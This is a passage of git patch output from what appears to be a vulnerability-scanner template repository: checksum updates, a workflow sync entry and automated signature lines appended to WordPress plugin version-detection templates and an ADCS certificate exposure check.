+http/technologies/wordpress/plugins/wordfence.yaml:43d1eb1e1e314aa16d9c1d5d0d5d4c59de91ac1b +http/technologies/wordpress/plugins/wordpress-importer.yaml:c7ba561f2a03d75e5f929c367ecdce158d4e456f +http/technologies/wordpress/plugins/wordpress-seo.yaml:a9de56a1598eaa8ab15ab968f734d71fdf2bc107 http/technologies/wordpress/plugins/wordpress-woosidebars.yaml:679cd62c97446d90fc7fbb50f64403cb10c4c319 -http/technologies/wordpress/plugins/worker.yaml:a17acbf9e46f87c541a9499ff7b622e6883c0a95 -http/technologies/wordpress/plugins/wp-crontrol.yaml:80a4f5cc8170375f7a04f10fd49a74809401b55f -http/technologies/wordpress/plugins/wp-fastest-cache.yaml:71f29be88bc81c153936755ec21ec81e600afbcf -http/technologies/wordpress/plugins/wp-file-manager.yaml:7bf2905b2ec1d8a399f618db40ccd43f0d7a8983 -http/technologies/wordpress/plugins/wp-google-maps.yaml:d6475e47fc5d9b40895dbca68d69098c2ab564d0 -http/technologies/wordpress/plugins/wp-mail-smtp.yaml:40bf467c8756ed316e5d3a139b6cd061db92d1f9 -http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:a875146e7ffc6014389f65bbe0831aca7ad93431 -http/technologies/wordpress/plugins/wp-migrate-db.yaml:e9ced93a24b716980d28c06c042386e83dc0e495 -http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:040ba3795f80542354d312b89c01d115b0e7ead3 -http/technologies/wordpress/plugins/wp-optimize.yaml:82b19b227be1270525e7929bc2babe304eaf61a4 -http/technologies/wordpress/plugins/wp-pagenavi.yaml:0665e3dd0eee43513627940a9c451814f6e860c5 -http/technologies/wordpress/plugins/wp-reset.yaml:c5f6e2b375ade7a6d7e65d0d9b3d6779b8f859fc -http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:6964d228e4b1ec1efebf5f849db73a05c2a1b93b -http/technologies/wordpress/plugins/wp-rollback.yaml:735ee4e85885b4f77398b5eca2ad1b9044764fdf -http/technologies/wordpress/plugins/wp-seopress.yaml:db2754b005ff6d27fc9f48f534ad1d00ff641d04 -http/technologies/wordpress/plugins/wp-sitemap-page.yaml:74b017e6e36fc299d4493e338382e35d34ee83d7 -http/technologies/wordpress/plugins/wp-smushit.yaml:9eabc87c7b01d0d90426c2b69b15a2d9472a3cd0 -http/technologies/wordpress/plugins/wp-statistics.yaml:7cd27ed57debb46391dad5f6e4049b4600f9ee41 -http/technologies/wordpress/plugins/wp-super-cache.yaml:326088abe0293b8c516bfc5df2e0c519e88a5359 +http/technologies/wordpress/plugins/worker.yaml:eec5a16391040875785d932499c9f260e8efeb8c +http/technologies/wordpress/plugins/wp-crontrol.yaml:a95b9be19c9a370db0c2ada00abb45799a890083 +http/technologies/wordpress/plugins/wp-fastest-cache.yaml:3bac8419d21ce83693d583293fb12b438a544402 +http/technologies/wordpress/plugins/wp-file-manager.yaml:227e50238a78872a0caf5ac0c54ab4d4fa33be67 +http/technologies/wordpress/plugins/wp-google-maps.yaml:f398fe5460d8180c0e85568b79baa92355130348 +http/technologies/wordpress/plugins/wp-mail-smtp.yaml:3c08f95f3bce5c44e7c5ebda373c397d0ddb8342 +http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:d7bb63c19f2338fd77cfa210fc4fa2e2c8bbff85 +http/technologies/wordpress/plugins/wp-migrate-db.yaml:996eb41fddbc34f6078ebecc34cececbb6eec504 +http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:252c64b3711943bbfd6d507669f1175f2225cbb2 +http/technologies/wordpress/plugins/wp-optimize.yaml:7d8bae34481b9723031a3574ce49620e76ad88ec +http/technologies/wordpress/plugins/wp-pagenavi.yaml:2a1f36db756a5f86740144301429285d3c50fee9 +http/technologies/wordpress/plugins/wp-reset.yaml:28019b1d96d3d4c456ac774c3e5cdeb666b06859 +http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:6100c61e48b0e15a0971d15714bdefa28c1fedcc +http/technologies/wordpress/plugins/wp-rollback.yaml:f7b2f501eb11a44d43b23d3933c06fe15927b2ca +http/technologies/wordpress/plugins/wp-seopress.yaml:1f1aa346cc5d9b8f6c766a4d6388dc8f90e34030 +http/technologies/wordpress/plugins/wp-sitemap-page.yaml:a4e9a4bb7976f9cab3829e15f7cf6a476a2e3792 +http/technologies/wordpress/plugins/wp-smushit.yaml:cff5012e05d9eca8dae054e4d73667340c631ddb +http/technologies/wordpress/plugins/wp-statistics.yaml:db2b26951dec4a78053fac69af816940d49cda0b +http/technologies/wordpress/plugins/wp-super-cache.yaml:312d5ce63e6b319b2688eb416664e575699fe649 http/technologies/wordpress/plugins/wp-user-avatar.yaml:a8aa0e902ead01de33b23343603d18b63829517e -http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:dd65e2ffbdc84dbf3228d895fa22841fb76c5ff6 -http/technologies/wordpress/plugins/wpcf7-redirect.yaml:9dd6b5f1ccf8c9b3b30094e8edce9798dd1ca588 -http/technologies/wordpress/plugins/wpforms-lite.yaml:4e224ac7801d6da6b222acce6b826cf740ee3cf9 -http/technologies/wordpress/plugins/wps-hide-login.yaml:d481a817a049b08781cceb60404a6bef24fa74ab -http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:50d517a09f92f7544c383104d325b0addd45536a +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:a9acaa8bc79b55109355d8894c249b6e99fba870 +http/technologies/wordpress/plugins/wpcf7-redirect.yaml:da8bff7c82756e3e1ac6810a8eb2ef194d109a43 +http/technologies/wordpress/plugins/wpforms-lite.yaml:cf27de8a9131c5a7427c0f9d3f4bfd5f378e26eb +http/technologies/wordpress/plugins/wps-hide-login.yaml:faf97e5fb87bd43caaa123bb77e5cb64d218f00d +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:f03291859093b6ab5196a683c017e300566beb9d http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:caf39ccc6507df09c0816caa7af29404c193d9a5 -http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:63c13bccce6608c2a1537bd233d9729f8e9e7eca +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:c3474b242e88f3dd31b5317051e69194f36317f9 http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml:0b85e26615c692bab9ceb5ae74dc9adec4097b9e http/technologies/wordpress-detect.yaml:a0148caf9d3f957171e7b75d4382dc7d54e454e5 http/technologies/workerman-websocket-detect.yaml:1396bc8234c4f538d5f57966b6b8084fe68f574f @@ -8887,7 +8888,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:536fcf1951bbd1a468afef8485f8c2cd8d3dd2fa +templates-checksum.txt:8a6aa78697c27df1a9b49a97349ce50daf43a30b wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 27408a40e92225c974d6cdb0fafa457e90ae8e0a Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 17 Jul 2024 10:56:56 +0000 Subject: [PATCH 1324/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index e7cfe20f9b..b23226a66c 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -21,6 +21,7 @@ on: - 'http/exposed-panels/gradle/gradle-develocity-panel.yaml' - 'http/exposures/configs/apache-ozone-conf.yaml' - 'http/exposures/configs/snoop-servlet-exposure.yaml' + - 'http/exposures/files/adcs-certificate.yaml' - 'http/misconfiguration/servicenow-title-injection.yaml' - 'http/technologies/apache/apache-ozone-detect.yaml' - 'http/technologies/wordpress/plugins/wp-crontrol.yaml' From 84a2749594685deca0edd73dff5a1a32210a4386 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 17 Jul 2024 10:57:58 +0000 Subject: [PATCH 1325/1841] Auto Template Signing [Wed Jul 17 10:57:58 UTC 2024] :robot: --- http/exposures/files/adcs-certificate.yaml | 1 + http/technologies/wordpress/plugins/ad-inserter.yaml | 1 + http/technologies/wordpress/plugins/add-to-any.yaml | 1 + http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 + http/technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 + http/technologies/wordpress/plugins/akismet.yaml | 1 + http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 + http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 + .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 + http/technologies/wordpress/plugins/amp.yaml | 1 + http/technologies/wordpress/plugins/antispam-bee.yaml | 1 + http/technologies/wordpress/plugins/astra-sites.yaml | 1 + http/technologies/wordpress/plugins/autoptimize.yaml | 1 + http/technologies/wordpress/plugins/backwpup.yaml | 1 + http/technologies/wordpress/plugins/better-search-replace.yaml | 1 + http/technologies/wordpress/plugins/better-wp-security.yaml | 1 + .../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 + http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 + http/technologies/wordpress/plugins/breeze.yaml | 1 + http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 + http/technologies/wordpress/plugins/chaty.yaml | 1 + .../technologies/wordpress/plugins/child-theme-configurator.yaml | 1 + http/technologies/wordpress/plugins/classic-editor.yaml | 1 + http/technologies/wordpress/plugins/classic-widgets.yaml | 1 + .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 + http/technologies/wordpress/plugins/cmb2.yaml | 1 + http/technologies/wordpress/plugins/coblocks.yaml | 1 + http/technologies/wordpress/plugins/code-snippets.yaml | 1 + http/technologies/wordpress/plugins/coming-soon.yaml | 1 + http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 + http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 + http/technologies/wordpress/plugins/contact-form-7.yaml | 1 + http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 + http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 + http/technologies/wordpress/plugins/cookie-notice.yaml | 1 + http/technologies/wordpress/plugins/copy-delete-posts.yaml | 1 + http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 + .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 + http/technologies/wordpress/plugins/custom-css-js.yaml | 1 + http/technologies/wordpress/plugins/custom-fonts.yaml | 1 + http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 + http/technologies/wordpress/plugins/disable-comments.yaml | 1 + http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 + http/technologies/wordpress/plugins/duplicate-page.yaml | 1 + http/technologies/wordpress/plugins/duplicate-post.yaml | 1 + http/technologies/wordpress/plugins/duplicator.yaml | 1 + .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 + http/technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 + http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 + http/technologies/wordpress/plugins/elementor.yaml | 1 + http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 + http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 + http/technologies/wordpress/plugins/envato-elements.yaml | 1 + .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 + http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 + .../technologies/wordpress/plugins/facebook-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 + .../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 1 + http/technologies/wordpress/plugins/flamingo.yaml | 1 + http/technologies/wordpress/plugins/fluentform.yaml | 1 + http/technologies/wordpress/plugins/font-awesome.yaml | 1 + .../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/formidable.yaml | 1 + http/technologies/wordpress/plugins/forminator.yaml | 1 + http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 + http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 + .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 + .../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 + http/technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 + http/technologies/wordpress/plugins/google-site-kit.yaml | 1 + .../technologies/wordpress/plugins/google-sitemap-generator.yaml | 1 + http/technologies/wordpress/plugins/gtranslate.yaml | 1 + http/technologies/wordpress/plugins/gutenberg.yaml | 1 + http/technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 + .../wordpress/plugins/header-footer-code-manager.yaml | 1 + http/technologies/wordpress/plugins/header-footer-elementor.yaml | 1 + http/technologies/wordpress/plugins/header-footer.yaml | 1 + http/technologies/wordpress/plugins/health-check.yaml | 1 + http/technologies/wordpress/plugins/hello-dolly.yaml | 1 + http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 + http/technologies/wordpress/plugins/hostinger.yaml | 1 + http/technologies/wordpress/plugins/image-optimization.yaml | 1 + http/technologies/wordpress/plugins/imagify.yaml | 1 + http/technologies/wordpress/plugins/imsanity.yaml | 1 + .../wordpress/plugins/insert-headers-and-footers.yaml | 1 + http/technologies/wordpress/plugins/instagram-feed.yaml | 1 + .../wordpress/plugins/intuitive-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/jetpack-boost.yaml | 1 + http/technologies/wordpress/plugins/jetpack.yaml | 1 + http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 + http/technologies/wordpress/plugins/kirki.yaml | 1 + http/technologies/wordpress/plugins/leadin.yaml | 1 + .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 + http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 + http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 + http/technologies/wordpress/plugins/loco-translate.yaml | 1 + http/technologies/wordpress/plugins/loginizer.yaml | 1 + .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 + http/technologies/wordpress/plugins/mailpoet.yaml | 1 + http/technologies/wordpress/plugins/maintenance.yaml | 1 + http/technologies/wordpress/plugins/mainwp-child.yaml | 1 + http/technologies/wordpress/plugins/malcare-security.yaml | 1 + http/technologies/wordpress/plugins/megamenu.yaml | 1 + http/technologies/wordpress/plugins/members.yaml | 1 + http/technologies/wordpress/plugins/meta-box.yaml | 1 + http/technologies/wordpress/plugins/metform.yaml | 1 + http/technologies/wordpress/plugins/ml-slider.yaml | 1 + http/technologies/wordpress/plugins/newsletter.yaml | 1 + .../technologies/wordpress/plugins/nextend-facebook-connect.yaml | 1 + http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 + http/technologies/wordpress/plugins/ninja-forms.yaml | 1 + http/technologies/wordpress/plugins/ocean-extra.yaml | 1 + http/technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 + http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 + http/technologies/wordpress/plugins/optinmonster.yaml | 1 + http/technologies/wordpress/plugins/otter-blocks.yaml | 1 + http/technologies/wordpress/plugins/password-protected.yaml | 1 + http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 + .../wordpress/plugins/pinterest-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 + http/technologies/wordpress/plugins/polylang.yaml | 1 + http/technologies/wordpress/plugins/popup-maker.yaml | 1 + http/technologies/wordpress/plugins/post-smtp.yaml | 1 + http/technologies/wordpress/plugins/post-types-order.yaml | 1 + .../wordpress/plugins/premium-addons-for-elementor.yaml | 1 + http/technologies/wordpress/plugins/pretty-link.yaml | 1 + http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 + http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 + http/technologies/wordpress/plugins/redirection.yaml | 1 + http/technologies/wordpress/plugins/redux-framework.yaml | 1 + http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/royal-elementor-addons.yaml | 1 + http/technologies/wordpress/plugins/safe-svg.yaml | 1 + http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 + http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 + http/technologies/wordpress/plugins/sg-security.yaml | 1 + http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 + .../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 + .../technologies/wordpress/plugins/simple-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/simple-history.yaml | 1 + http/technologies/wordpress/plugins/siteguard.yaml | 1 + http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 + http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 + http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 + .../wordpress/plugins/sticky-header-effects-for-elementor.yaml | 1 + .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 + http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 + http/technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 + http/technologies/wordpress/plugins/tablepress.yaml | 1 + http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 + http/technologies/wordpress/plugins/templately.yaml | 1 + http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 + http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 + .../wordpress/plugins/translatepress-multilingual.yaml | 1 + .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 + http/technologies/wordpress/plugins/under-construction-page.yaml | 1 + http/technologies/wordpress/plugins/updraftplus.yaml | 1 + http/technologies/wordpress/plugins/user-role-editor.yaml | 1 + http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 + .../technologies/wordpress/plugins/webp-converter-for-media.yaml | 1 + http/technologies/wordpress/plugins/webp-express.yaml | 1 + .../technologies/wordpress/plugins/widget-importer-exporter.yaml | 1 + .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 + .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 + http/technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 + .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 + .../wordpress/plugins/woocommerce-legacy-rest-api.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 + .../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 + .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 + http/technologies/wordpress/plugins/woocommerce.yaml | 1 + http/technologies/wordpress/plugins/wordfence.yaml | 1 + http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 + http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 + http/technologies/wordpress/plugins/worker.yaml | 1 + http/technologies/wordpress/plugins/wp-crontrol.yaml | 1 + http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 + http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 + http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 + http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 + http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 + http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 + http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 + http/technologies/wordpress/plugins/wp-optimize.yaml | 1 + http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 + http/technologies/wordpress/plugins/wp-reset.yaml | 1 + .../wordpress/plugins/wp-reviews-plugin-for-google.yaml | 1 + http/technologies/wordpress/plugins/wp-rollback.yaml | 1 + http/technologies/wordpress/plugins/wp-seopress.yaml | 1 + http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 + http/technologies/wordpress/plugins/wp-smushit.yaml | 1 + http/technologies/wordpress/plugins/wp-statistics.yaml | 1 + http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 + http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 + http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 + http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 + .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 + 201 files changed, 201 insertions(+) diff --git a/http/exposures/files/adcs-certificate.yaml b/http/exposures/files/adcs-certificate.yaml index 537d3676f3..9f9958360a 100644 --- a/http/exposures/files/adcs-certificate.yaml +++ b/http/exposures/files/adcs-certificate.yaml @@ -25,3 +25,4 @@ http: - contains(body, "CertEnroll") || contains(body, "certenroll") - status_code == 200 condition: and +# digest: 4b0a00483046022100ab09f0fa5ad15180858e288d8f9faa7b3732391ceed46de0dbabb6d3c3b0e75e022100ef042bef6fdfee276767180092a43440c2de421c6a97c1d95c26a57e6a1276f6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index 3fd2256749..7c04b2158c 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221008fc666c1ec15a39c9ce9de9649b39b963f931d967ca3ce3ffeae9187eea3f4b0022100c4f8cf8263caf29a117d07020353ff33322e803a72231a22252cafd0d4b1c6ff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index 6a0d344b63..0694ce0bf4 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ad3b3a0e09f9c8df8e4d7182b19d8a4f2d1a5c98275410586275bc5cb055d153022024ea7609535c3db5b0acb942f79c6a03c41f7729113b614f942b051302dc6812:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 6fb5080bc8..0381db4b6d 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100cea6afabd8a785f41040db23ab23537cdfac052444b3a29e71f3d451f3da35fb0220640016be59bf3f0458887004a71212d9c2b146e648f2067952b1274605a29ae1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index cddbb4bb2e..7ebda61950 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009bbfcf881ce6986d11134979b3a10119c0f46272243bf52f49479d43ed653278022031a72e4dab5002cc6a0686490edc5fe8120da682a131f2d44d1f052d1aefa653:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index 6f253f9f55..6f071a3da9 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220709a4af0e03355f50baef84b992ac460de6c8ff2854312c2cb65182bcf9c17ca0220726d9a9362dccf2d9ee57c49c24ee2d4e0f921bdd4611962185a68dabe01cbcb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index fe45de4d04..00e38ad6c1 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100fe4cea615da0ffda9fc6b7c4bfe5ee5b19f1e313ea3792fd325b513610a9784b022020ad9f1388142e76050685ec797d7f5bfdee1e2edbadfa78248ed61eaf92072d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 69e425f446..9169535d1c 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502204145de7639cc1b1225f4f30e0da6bf93542ccc82da81f64595c855ffea9c8a87022100e7580bac81bed25a8f4861b105cecd638766f5d5a802d10916c8b77cff991985:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index 9c07c65e4e..cc62911c19 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202ed66c4f82a8b1a7edcf387ed7b8a3dfd0ea437018b0d9ac5bfd06b38b37f097022047b564573c1e0f45513c07c9a0cb886e26d95f86958f17b8636c35814dc706b3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index 92c8f5656e..29f3c49dfd 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022071e9ba3276bb6ccee34bf80f78ff3171c59ed72e2863857e5a27cd5924b2e81202210088debec8e4cd634bd6c04c791dbee0722732b50fac5363099fd449c67718fad2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index 70975a19a1..84cf6d5259 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022050210f2739e84ab2315aec101a2b1b78a8460eaa55fa113c525502804293774802204c02f6cbe9912c96871b4a18ba870283f6c46d086e72b07f31e0baa5f1ac7572:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index fd7e3e99dd..e5fbd7fbce 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a7d7ca031d1771aabc8310dd91b4edbe5836fed4caf3e5a8846df5e45144364802202861f36e475b15f0a4dda3b3d8d431388d0d8d570b847c6d82c2e7409a3b795a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 18f2a2ae84..9757d352b8 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220407b8270a888eab8d27d48c56469863d7c257b2c1e151a22c6b69f05946e14c4022100aba9488af54b37776840353735ae7e7434d96bf4f5ae7fd62f61a797a7a74d14:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index 11cb41fb2c..37a39b50f1 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022071102dd3ef8b9429c58bf1ff3d380bac7e423dddc74a7d5be96c8c8f9b950152022012985ee2d1b630b2c76f0415d272c017406a638539a26c254738a9f65d049aae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index df3c5f3a94..ad45586645 100644 --- 